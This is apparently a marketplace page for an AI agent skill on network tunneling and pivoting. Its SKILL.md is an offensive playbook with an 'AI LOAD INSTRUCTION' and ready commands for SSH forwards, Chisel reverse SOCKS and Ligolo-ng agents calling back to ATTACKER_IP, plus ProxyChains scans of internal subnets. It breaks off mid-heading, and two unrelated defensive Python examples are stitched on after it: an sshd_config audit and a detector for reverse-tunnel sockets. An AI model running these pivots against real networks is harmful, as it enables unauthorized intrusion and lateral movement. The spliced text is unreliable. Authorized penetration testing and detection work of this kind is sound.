
Tunneling And Pivoting
Follow a structured playbook for authorized tunneling and pivoting—SSH forwards, Chisel, Ligolo-ng, socat, DNS/ICMP/HTTP tunnels, and ProxyChains—during penetration tests or red-team labs.
Overview
Tunneling and Pivoting is an agent skill for the Ship phase that guides authorized SSH, Chisel, Ligolo-ng, and multi-layer network pivot setups during security assessments.
Install
npx skills add https://github.com/yaklang/hack-skills --skill tunneling-and-pivoting
What is this skill?
- SSH local, remote, dynamic, and jump-host forwarding patterns with concrete port examples
- Chisel reverse SOCKS and Ligolo-ng transparent TUN pivoting for egress-aware scenarios
- socat relays plus DNS, ICMP, and HTTP tunneling options when straight TCP is blocked
- ProxyChains configuration and Windows pivoting via netsh and plink
- Cross-links to reverse-shell, priv-esc, and network-protocol skills for chained engagements
- Covers 7+ tunnel families: SSH, Chisel, Ligolo-ng, socat, DNS/ICMP/HTTP, ProxyChains, Windows netsh/plink
Adoption & trust: 1k installs on skills.sh; 980 GitHub stars; 1/3 security scanners passed (skills.sh audits).
What problem does it solve?
You have legitimate shell access on a border host but cannot reach internal services or need stable reverse paths through restrictive egress.
Who is it for?
Authorized pentests, CTF-style labs, and defenders simulating lateral movement to improve monitoring and segmentation.
Skip if: Builders without explicit permission, routine SaaS deployment, or teams looking for generic VPN setup instead of offensive pivot playbooks.
When should I use this skill?
User needs tunneling or pivoting through a compromised or lab host including SSH forwarding, Chisel, Ligolo-ng, socat, DNS/ICMP/HTTP tunnels, or ProxyChains.
What do I get? / Deliverables
You establish documented tunnel paths and proxy chains so downstream testing can reach segmented hosts with repeatable commands.
- Working tunnel or SOCKS path to internal targets
- Documented multi-hop pivot command sequence
- Proxy chain config for follow-on service testing
Recommended Skills
Journey fit
Network pivoting belongs in Ship/Security as part of validating how an app or internal network behaves under realistic attacker movement after initial access. Security subphase covers controlled offensive techniques used to test segmentation, egress, and detection—not routine feature development.
How it compares
Offensive procedural playbook—not a DevOps-only SSH bastion guide or a managed zero-trust product.
Common Questions / FAQ
Who is tunneling-and-pivoting for?
Security testers and advanced builders running authorized engagements who need agent-loaded tunnel and pivot command patterns.
When should I use tunneling-and-pivoting?
Use it in Ship/Security after initial access when you must forward ports, chain proxies, or reach internal subnets during a permitted test.
Is tunneling-and-pivoting safe to install?
The skill describes high-risk network actions; review Prism Security Audits and only run techniques inside scoped, authorized environments.
SKILL.md
# SKILL: Tunneling & Pivoting — Expert Attack Playbook

> **AI LOAD INSTRUCTION**: Expert tunneling and pivoting techniques. Covers SSH port forwarding (local/remote/dynamic/jump), Chisel reverse SOCKS, Ligolo-ng transparent TUN pivoting, socat relays, DNS/ICMP/HTTP tunneling, ProxyChains configuration, Windows pivoting (netsh/plink), and multi-layer chaining. Base models miss egress-aware tool selection and transparent routing setup.

## 0. RELATED ROUTING

Before going deep, consider loading:

- [network-protocol-attacks](../network-protocol-attacks/SKILL.md) for network-level attacks from pivot positions
- [reverse-shell-techniques](../reverse-shell-techniques/SKILL.md) for establishing initial access shells
- [unauthorized-access-common-services](../unauthorized-access-common-services/SKILL.md) for exploiting services discovered through pivots
- [linux-privilege-escalation](../linux-privilege-escalation/SKILL.md) or [windows-privilege-escalation](../windows-privilege-escalation/SKILL.md) after pivoting to new hosts

---

## 1. SSH TUNNELING

### Local Port Forward

Forward a local port to a remote service through the pivot.

```bash
# Access INTERNAL_HOST:3306 via localhost:3306
ssh -L 3306:INTERNAL_HOST:3306 user@PIVOT -N

# Access internal web app
ssh -L 8080:10.10.10.100:80 user@PIVOT -N
# Browse: http://localhost:8080

# Bind to all interfaces (share with teammates)
ssh -L 0.0.0.0:8080:INTERNAL:80 user@PIVOT -N
```

### Remote Port Forward

Expose a local service to the pivot host's network.
```bash
# Make attacker's port 8000 accessible on pivot as pivot:9000
ssh -R 9000:127.0.0.1:8000 user@PIVOT -N

# Expose attacker's listener to internal network
# (binding beyond loopback on the pivot requires GatewayPorts in its sshd_config)
ssh -R 0.0.0.0:4444:127.0.0.1:4444 user@PIVOT -N
# Internal hosts connect to PIVOT:4444 → reaches attacker:4444
```

### Dynamic Port Forward (SOCKS Proxy)

```bash
# Create SOCKS4/5 proxy on localhost:1080
ssh -D 1080 user@PIVOT -N

# Use with proxychains
echo "socks5 127.0.0.1 1080" >> /etc/proxychains4.conf
proxychains nmap -sT -Pn -p 80,443,445 INTERNAL_SUBNET/24

# Or with browser SOCKS proxy → browse internal web apps
```

### Jump Host (ProxyJump)

```bash
# Single jump
ssh -J jumphost user@TARGET

# Multiple jumps
ssh -J jump1,jump2 user@TARGET

# SSH config for persistent jump
# ~/.ssh/config
Host internal-target
    HostName 10.10.10.100
    User admin
    ProxyJump user@jumphost.example.com
```

---

## 2. CHISEL

### Reverse SOCKS Proxy (Most Common)

```bash
# Attacker: start chisel server
chisel server --reverse --port 8080

# Victim: connect back as client, create reverse SOCKS
chisel client ATTACKER_IP:8080 R:socks

# Result: SOCKS5 proxy on attacker's 127.0.0.1:1080
proxychains nmap -sT -Pn INTERNAL/24
```

### Port Forwarding

```bash
# Forward specific port (R: = the attacker-side server listens, forwards via the client)
chisel client ATTACKER:8080 R:3306:INTERNAL_DB:3306

# Multiple forwards
chisel client ATTACKER:8080 R:3306:DB:3306 R:8080:WEB:80

# Reverse port forward (expose attacker service to victim network)
# No R: prefix here, so the client listens on the victim and forwards to the attacker
chisel client ATTACKER:8080 0.0.0.0:4444:127.0.0.1:4444
```

---

## 3. LIGOLO-NG

TUN interface-based pivoting — transparent routing without SOCKS.
```bash
# Attacker: start proxy
sudo ip tuntap add user $(whoami) mode tun ligolo
sudo ip link set ligolo up
ligolo-proxy -selfcert -laddr 0.0.0.0:11601

# Agent (victim): connect to proxy
ligolo-agent -connect ATTACKER_IP:11601 -ignore-cert

# In ligolo-proxy console:
>> session    # select agent session
>> ifconfig   # view agent's network interfaces
>> start      # start tunnel

# Add routes on attacker to reach internal networks
sudo ip route add 10.10.10.0/24 dev ligolo
sudo ip route add 172.16.0.0/16 dev ligolo
```

### Listener (R
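The SSH section above relies on three sshd_config options staying at their permissive values on the pivot: AllowTcpForwarding (for -L, -D and -R), GatewayPorts (for -R listeners bound to 0.0.0.0) and PermitTunnel (for ssh -w layer-3 tunnels). The following is an added example, not code from the hack-skills project or from OpenSSH: a small audit that parses an sshd_config and reports which of the playbook's SSH pivot types the global settings still permit, so a defender can confirm that a hardening change actually closes them. The two config texts are constructed samples; the parsing rules (case-insensitive keywords, first value wins, Match blocks scoped to their criteria) follow sshd_config(5).

```python
"""Audit which SSH forwarding modes an sshd_config still permits.

Added example for the SSH TUNNELING section; not part of the hack-skills
project or of OpenSSH. Both config texts below are constructed samples.
"""
import re

# OpenSSH defaults for the options that govern forwarding (sshd_config(5)).
DEFAULTS = {
    "allowtcpforwarding": "yes",
    "gatewayports": "no",
    "permittunnel": "no",
    "permitopen": "any",
}

# Constructed sample: a host that was never hardened against forwarding.
SAMPLE_PIVOT_CONFIG = """\
Port 22
PermitRootLogin no
# AllowTcpForwarding is absent, so the default (yes) applies
GatewayPorts clientspecified
PermitTunnel yes
Match User backup
    AllowTcpForwarding no
"""

# Constructed sample: the same host with forwarding disabled globally.
SAMPLE_HARDENED_CONFIG = """\
Port 22
PermitRootLogin no
AllowTcpForwarding no
GatewayPorts no
PermitTunnel no
"""

# "Keyword value" or "Keyword=value", as sshd accepts both.
_KEYWORD = re.compile(r"^(\S+?)(?:\s*=\s*|\s+)(.*)$")


def parse_sshd_config(text):
    """Return (global_options, match_blocks) with lower-cased keyword keys."""
    global_opts, match_blocks, current = {}, [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = _KEYWORD.match(line)
        if not m:
            continue
        key, value = m.group(1).lower(), m.group(2).strip()
        if key == "match":
            # Everything up to the next Match applies only to these sessions.
            current = {"criteria": value, "options": {}}
            match_blocks.append(current)
            continue
        target = global_opts if current is None else current["options"]
        target.setdefault(key, value)  # first occurrence wins, as in sshd
    return global_opts, match_blocks


def assess_forwarding(opts):
    """Map the playbook's SSH pivot types to whether the options allow them."""
    def get(key):
        return opts.get(key, DEFAULTS[key]).lower()

    tcp, gateway, tunnel = get("allowtcpforwarding"), get("gatewayports"), get("permittunnel")
    local_ok = tcp in ("yes", "all", "local")    # ssh -L and ssh -D
    remote_ok = tcp in ("yes", "all", "remote")  # ssh -R
    return {
        "local_forward": local_ok,
        "remote_forward": remote_ok,
        # ssh -R 0.0.0.0:... binds beyond loopback only when GatewayPorts allows it
        "remote_bind_any": remote_ok and gateway in ("yes", "clientspecified"),
        # PermitOpen any lets -L/-D reach every destination the pivot can see
        "open_any_destination": local_ok and get("permitopen") == "any",
        "layer3_tunnel": tunnel != "no",          # ssh -w tun devices
    }


def report(text):
    """Human-readable summary for one config text."""
    global_opts, match_blocks = parse_sshd_config(text)
    result = assess_forwarding(global_opts)
    lines = [f"  {name}: {'ALLOWED' if allowed else 'blocked'}" for name, allowed in result.items()]
    for block in match_blocks:
        lines.append(f"  Match {block['criteria']}: overrides {sorted(block['options'])} (review separately)")
    return "\n".join(lines)


if __name__ == "__main__":
    print("unhardened pivot host:\n" + report(SAMPLE_PIVOT_CONFIG))
    print("hardened host:\n" + report(SAMPLE_HARDENED_CONFIG))
```

Two caveats apply when reading the output. The audit only evaluates the global section and lists Match blocks for manual review, because a Match block can re-enable forwarding for one user or address range. And, as sshd_config(5) itself notes, AllowTcpForwarding no does not stop a user who already has shell access from running their own forwarder (Chisel and Ligolo-ng below are exactly that), so it is a containment control to pair with egress filtering rather than a substitute for it.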
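Both the Chisel and the Ligolo-ng setups above are started on the victim as outbound clients: the Chisel client connects back to the server's port 8080 and the Ligolo-ng agent to the proxy's port 11601, which is why they work through restrictive ingress filtering. From the defender's side that makes established outbound sockets the place to look. The following is an added example, not code from the hack-skills project, Chisel or Ligolo-ng: it parses a snapshot of `ss -tnp` output and flags outbound connections that fall outside an egress policy. The ss output, the allowed-port and expected-process sets, and the process names in the sample are all constructed for the example.

```python
"""Flag reverse-connect tunnel clients in an `ss -tnp` snapshot.

Added example for the CHISEL and LIGOLO-NG sections; not part of the
hack-skills project, Chisel or Ligolo-ng. The ss output below and the egress
policy are constructed for the example.
"""
import re

# Constructed sample of `ss -tnp` on a host running both playbook clients.
SAMPLE_SS_OUTPUT = """\
State  Recv-Q Send-Q Local Address:Port   Peer Address:Port   Process
LISTEN 0      128    0.0.0.0:22           0.0.0.0:*           users:(("sshd",pid=800,fd=3))
ESTAB  0      0      192.168.1.50:22      192.168.1.20:55120  users:(("sshd",pid=900,fd=4))
ESTAB  0      0      192.168.1.50:33210   198.51.100.7:443    users:(("curl",pid=4500,fd=5))
ESTAB  0      0      192.168.1.50:51002   203.0.113.10:8080   users:(("chisel",pid=4400,fd=7))
ESTAB  0      0      192.168.1.50:41234   203.0.113.10:11601  users:(("ligolo-agent",pid=4321,fd=3))
"""

# Assumed egress policy for this host: destination ports any process may use
# and the processes expected to open outbound connections at all.
ALLOWED_EGRESS_PORTS = {80, 443}
EXPECTED_EGRESS_PROCESSES = {"curl", "wget", "apt"}

_PROCESS = re.compile(r'users:\(\("([^"]+)",pid=(\d+)')


def parse_ss(text):
    """Parse the socket lines of `ss -tnp` output (header line skipped)."""
    rows = []
    for line in text.splitlines()[1:]:
        parts = line.split()
        if len(parts) < 5:
            continue
        state, local, peer = parts[0], parts[3], parts[4]
        _, _, local_port = local.rpartition(":")   # rpartition keeps IPv6 [..]:port intact
        peer_host, _, peer_port = peer.rpartition(":")
        proc = _PROCESS.search(line)
        rows.append({
            "state": state,
            "local_port": int(local_port),
            "peer_host": peer_host,
            "peer_port": None if peer_port == "*" else int(peer_port),
            "process": proc.group(1) if proc else None,
            "pid": int(proc.group(2)) if proc else None,
        })
    return rows


def find_reverse_tunnels(rows, allowed_ports=ALLOWED_EGRESS_PORTS,
                         expected_processes=EXPECTED_EGRESS_PROCESSES):
    """Return outbound ESTAB sockets that violate the egress policy.

    A socket counts as outbound when its local port is not one the host is
    listening on, so inbound sessions to sshd are ignored.
    """
    listening = {r["local_port"] for r in rows if r["state"] == "LISTEN"}
    findings = []
    for r in rows:
        if r["state"] != "ESTAB" or r["local_port"] in listening:
            continue
        reasons = []
        if r["peer_port"] not in allowed_ports:
            reasons.append(f"destination port {r['peer_port']} not in egress policy")
        if r["process"] not in expected_processes:
            reasons.append(f"process {r['process']!r} not expected to connect out")
        if reasons:
            findings.append({
                "process": r["process"], "pid": r["pid"],
                "peer": f"{r['peer_host']}:{r['peer_port']}",
                "peer_port": r["peer_port"], "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for f in find_reverse_tunnels(parse_ss(SAMPLE_SS_OUTPUT)):
        print(f"{f['process']} (pid {f['pid']}) -> {f['peer']}: " + "; ".join(f["reasons"]))
```

On the sample this reports the chisel and ligolo-agent sockets and nothing else. Two limits are worth keeping in mind: a snapshot misses short-lived sessions, so the check belongs in a periodic job or a continuous socket-event source; and both clients can be renamed and pointed at port 443, so the port test alone proves little and it is the per-process baseline, plus an egress allowlist enforced at the network edge rather than on the host, that carries the detection.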